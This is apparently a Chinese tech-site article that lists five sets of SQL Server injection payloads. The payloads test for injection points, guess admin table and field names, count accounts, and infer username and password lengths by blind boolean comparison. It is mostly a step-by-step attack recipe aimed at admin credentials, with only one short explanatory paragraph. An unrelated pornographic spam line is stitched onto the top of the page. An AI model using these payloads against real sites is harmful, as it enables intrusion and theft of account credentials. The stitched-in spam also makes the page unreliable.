自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

SQL注入語句五例

作者:佚名
數(shù)據(jù)庫 SQL Server
SQL注入語句是SQL語言中非常重要的部分,下面為您介紹的是SQL注入語句的5個例子,供您參考,如果您感興趣的話,不妨一看。

SQL注入語句是學(xué)習(xí)SQL語句過程中需要掌握的知識,下面就為您介紹5個標(biāo)準(zhǔn)的SQL注入語句,希望對您了解SQL注入語句有所幫助。

1.判斷有無注入點(diǎn)

  1. ; and 11=1 and 1=2 

 

2.猜表一般的表的名稱無非是admin adminuser user pass password 等..

  1. and 0<>(select count(*) from *)  
  2. and 0<>(select count(*) from admin) ---判斷是否存在admin這張表 

 

3.猜帳號數(shù)目 如果遇到0< 返回正確頁面 1<返回錯誤頁面說明帳號數(shù)目就是1個

  1. and 0<(select count(*) from admin)  
  2. and 1<(select count(*) from admin) 

 

4.猜解字段名稱 在len( ) 括號里面加上我們想到的字段名稱.

  1. and 1=(select count(*) from admin where len(*)>0)--  
  2. and 1=(select count(*) from admin where len(用戶字段名稱name)>0)   
  3. and 1=(select count(*) from admin where len(_blank>密碼字段名稱password)>0) 

 

5.猜解各個字段的長度 猜解長度就是把>0變換 直到返回正確頁面為止

  1. and 1=(select count(*) from admin where len(*)>0)   
  2. and 1=(select count(*) from admin where len(name)>6) 錯誤  
  3. and 1=(select count(*) from admin where len(name)>5) 正確 長度是6  
  4. and 1=(select count(*) from admin where len(name)=6) 正確  
  5.  
  6. and 1=(select count(*) from admin where len(password)>11) 正確  
  7. and 1=(select count(*) from admin where len(password)>12) 錯誤 長度是12  
  8. and 1=(select count(*) from admin where len(password)=12) 正確 

延伸閱讀

所謂SQL注入,就是通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令,比如先前的很多影視網(wǎng)站泄露VIP會員密碼大多就是通過WEB表單遞交查詢字符暴出的,這類表單特別容易受到SQL注入式攻擊.

 

【編輯推薦】

SQL SERVER事務(wù)的語法介紹

Sql Server視圖的概念

使用SQL查詢連續(xù)號碼段的方法

實(shí)現(xiàn)子孫樹查詢的經(jīng)典SQL語句

查詢表的字段名的sql語句寫法

責(zé)任編輯:段燃 來源: 互聯(lián)網(wǎng)
SQL注入語句
相關(guān)推薦

2012-04-12 15:06:44

2011-03-31 11:03:15

2010-12-20 16:04:30

2011-04-18 14:12:44

2017-08-10 10:23:59

2010-04-13 14:35:17

2020-10-26 07:04:29

SQL注入mysql

2013-05-02 15:09:22

2020-09-28 09:30:13

mybatis

2011-10-19 10:47:56

2020-12-16 13:22:37

Web安全SQL工具

2023-03-30 09:10:06

SQLSELECTFROM

2009-09-07 16:25:14

Linq To SQL

2011-05-19 13:19:38

sql數(shù)據(jù)刪除

2019-10-18 20:22:23

SQL數(shù)據(jù)庫MySQL

2011-03-31 11:14:51

Sql語句優(yōu)化

2009-02-04 16:51:48

2019-02-22 09:00:00

2020-08-07 08:13:08

SQL攻擊模式

2009-11-02 13:47:09

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號